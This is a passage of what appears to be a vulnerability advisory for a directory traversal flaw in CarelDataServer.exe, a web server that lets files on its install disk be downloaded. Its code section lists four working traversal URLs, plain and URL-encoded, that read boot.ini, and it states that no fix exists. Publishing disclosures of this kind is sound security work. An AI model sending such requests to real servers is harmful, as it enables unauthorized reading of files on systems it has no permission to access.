CarelDataServer.exe is a web server listening on port 80.
The software is affected by a directory traversal vulnerability that
allows to download the files located on the disk where it's installed.
Both slash and backslash and their HTTP encoded values are supported.
#######################################################################
===========
3) The Code
===========
http://SERVER/..\..\..\..\..\..\boot.ini
http://SERVER/../../../../../../boot.ini
http://SERVER/..%5c..%5c..%5c..%5c..%5c..%5cboot.ini
http://SERVER/..%2f..%2f..%2f..%2f..%2f..%2fboot.ini
#######################################################################
======
4) Fix
======
No fix.
#######################################################################